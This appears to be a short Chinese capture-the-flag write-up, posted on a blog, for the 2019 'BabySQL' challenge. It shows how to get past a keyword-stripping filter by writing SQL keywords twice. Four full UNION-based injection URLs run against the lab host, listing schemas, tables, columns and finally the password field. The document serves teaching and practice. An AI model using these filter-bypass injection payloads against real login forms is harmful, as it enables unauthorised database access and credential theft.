[极客大挑战 2019]BabySQL

[极客大挑战 2019]BabySQL

首先简单测试一下题目

0x00

发现from union select 这些关键函数都被替换为空,那么猜测这道题目是一道双写绕过的SQL注入题

0x01

尝试爆破数据库名

http://714be2fb-b39b-488b-83f2-f8ec05927586.node3.buuoj.cn/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%20%23

然后我们发现了ctf库,推测这个库中藏有flag

0x02

爆破数据表

http://714be2fb-b39b-488b-83f2-f8ec05927586.node3.buuoj.cn/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema%3Ddatabase()%23

0x03

查询列名

http://714be2fb-b39b-488b-83f2-f8ec05927586.node3.buuoj.cn/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27b4bsql%27%23

0x04

查询字段名

http://714be2fb-b39b-488b-83f2-f8ec05927586.node3.buuoj.cn/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(passwoorrd)%20frfromom%20b4bsql%23

0x05

acc
End

posted @ 2022-02-21 11:46  Townmacro  阅读(75)  评论(0编辑  收藏  举报